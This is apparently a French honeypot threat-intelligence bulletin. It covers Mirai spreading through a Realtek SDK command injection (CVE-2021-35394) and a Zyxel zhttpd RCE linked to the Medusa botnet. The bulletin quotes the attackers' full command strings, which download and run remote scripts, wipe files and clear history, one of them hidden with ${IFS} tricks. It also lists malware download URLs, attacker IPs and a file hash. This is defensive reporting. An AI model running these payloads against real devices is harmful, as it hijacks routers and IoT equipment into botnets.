Une bonne compréhension des menaces actives est nécessaire pour adopter une bonne position de sécurité. Le rapport suivant présente les tendances actuelles qui se dégagent du bruit de fond d’internet en se basant sur les données de deux dernières semaines de logs de nos Honeypots.
Exploitation d’une vulnérabilité dans SDK Realtek pour propager le botnet Mirai
Une vulnérabilité par injection de commande a été découverte en 2021 dans certaines versions de Realtek Jungle SDK. Elle permet à un attaquant non authentifié d’exécuter des commandes arbitraires sur le système affecté. Cette vulnérabilité est répertoriée sous la CVE-2021-35394 et a un score CVSSv3 de 9.8 (critique).
Les micropuces Realtek sont vendues et incluses dans divers produits IoT et routeurs de nombreux fabricants dans le monde entier.
Ces deux dernières semaines, une augmentation des tentatives d’exploitation de la CVE-2021-35394 a été observée sur nos honeypots dans le but de propager le botnet Mirai, un logiciel malveillant automatisé et auto-reproducteur.
22 adresses IP ont mené ces tentatives d’exploitation, ciblant des serveurs situés en Asie du Pacifique et en Europe (voir les IoCs ci-dessous). 80 % de ces tentatives d’exploitation proviennent d’adresses IP enregistrées aux États-Unis, 6 % aux Émirats Arabes Unis et 5 % au Viêtnam. Près de 80 % des demandes provenaient de l’AS211252 Delis LLC.
Si l’exploit réussit, l’attaquant utilise la requête suivante :
cd /tmp || cd /var/run || cd /mnt || cd /root || cd / ; wget <URL> ; chmod 777 * ; sh <filename1> ; tftp -g <adresse IP> -r <filename2> ; chmod 777 * ; sh <filename2> ; rm -rf *.sh ; history -c
Cette commande vise à :
- Accéder à tmp, /var/run, /mnt, /root ou /
- Télécharger <filename1> à partir de l’URL dédiée et l’exécuter à partir de basic shell
- Télécharger et exécuter le <filename2>
- Nettoyer le fichier temporaire et l’historique local
Les fichiers en question sont des variants de Mirai.
Vous trouverez ci-dessous les URLs contenus dans les requêtes web observées sur nos honeypots pour récupérer les fichiers malveillants:
URL contenue dans la requête web | Informations complémentaires |
http[:]//87.251.67[.]57/EkSgbins.sh http[:]//103.186.147[.]155/bins/mips http[:]//94.232.46[.]201/Sakura.sh http[:]//46.3.112[.]133:808/download.sh http://104.244.72.8/jack5tr.sh http[:]//170.64.182[.]9/bins/void.mpsl http[:]//45.154.3[.]16/mpsl http[:]//46.3.112[.]143/download.sh http[:]//46.3.112[.]162/download.sh http[:]//195.133.40[.]248/mpsl http[:]//111.92.242[.]146/mpsl | – |
http[:]//107.189.13[.]143/download.sh http[:]//143.198.217[.]16/bins/mpsl http[:]//45.148.116[.]40/bins/mips http[:]//47.87.241[.]156/bins/kgf.mips http[:]//84.54.50[.]104/mips http[:]//79.137.198[.]58/hiddenbin/boatnet.mips http[:]//79.137.198[.]58/hiddenbin/boatnet.x86_64 | Ces URL sont connues pour avoir téléchargé un variant Linux de Mirai. |
http://43.139.138[.]38/mpsl http://109.206.240[.]148/bins/mp http[:]//64.93.80[.]146/mpsl http[:]//109.206.240[.]231/binS/botx.mpsl | URL indisponible à la rédaction |
Ces attaques à grande échelle sont préoccupantes pour les organisations, car les IoTs et les routeurs sont souvent négligés en matière de cybersécurité. Ces détections s’alignent sur les observations récentes de la communauté cyber concernant une augmentation notable d’attaques contre les produits Realtek.
Pour prévenir de telles attaques, il est important d’appliquer les mises à jour du fournisseur dès qu’elles sont disponibles. Un outil de sécurité tel que TEHTRIS NTA vous aidera à détecter toute compromission de vos appareils.
IoCs – Adresses IP
- 109.206.240[.]231
- 185.117.74[.]19
- 103.90.160[.]10
- 103.180.147[.]228
- 84.54.50[.]104
- 14.225.254[.]162
- 109.206.240[.]9
- 107.189.12[.]152
- 178.128.25[.]126
- 167.172.175[.]228
- 185.225.73[.]104
- 107.189.29[.]121
- 185.221.162[.]49
- 107.189.1[.]237
- 193.35.18[.]109
- 170.64.174[.]2
- 194.87.151[.]204
- 178.128.122[.]209
- 194.113.194[.]43
- 77.91.78[.]10
- 45.128.232[.]11
- 87.121.221[.]104
Exploitation d’une vulnérabilité RCE dans le produit Zyxel
Une vulnérabilité à haut risque, divulguée fin 2020 , affecte les produits Zyxel et permet à un attaquant d’exécuter du code arbitraire à distance. La vulnérabilité est due à un traitement inadéquat des requêtes HTTP dans le serveur web zhttpd. Zyxel est un fabricant taïwanais de modems, de commutateurs réseau, de routeurs et de points d’accès Wi-Fi, entre autres.
Les cyberattaquants s’appuient toujours sur cet exploit et parcourent internet à la recherche d’appareils vulnérables. Au cours des deux dernières semaines, une requête web unique provenant de plus de 80 adresses IP a été observée :
/bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http[ :]//163.123.143.126/x.sh;${IFS}sh${IFS}x.sh ;
L’attaquant cherche à supprimer ce qui se trouve dans le fichier tmp et à télécharger puis exécuter le binaire x.sh à partir de l’URL http[ :]//163.123.143[.]126/x.sh. Le fichier correspond au SHA256 945196525c4b0a14709f68b2751811d3991265c22d5018b5941207414f95985d , vu pour la première fois en décembre 2022 et potentiellement associé au botnet Linux Medusa. Le botnet Medusa existe depuis des années, et une nouvelle variante a été repérée, basée sur une fuite du code source du botnet Mirai.
1/4 des tentatives d’exploitation proviennent d’adresses IP enregistrées en Chine, les autres principaux pays d’origine étant l’Inde, l’Ukraine, la Suède et l’Australie.
Pour éviter qu’un appareil Zyxel ne soit ajouté à un botnet, il est impératif de mettre à jour les versions dès que le fournisseur publie des correctifs.
Exploiter les routeurs D-Link (avec IoCs – Adresses IP)
Ce sujet vous intéresse ?
Recevez plus d’informations sur ce bulletin des alertes révélées par nos honeypots.
Abonnez-vous à notre newsletter threat intelligence bimensuelle !
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.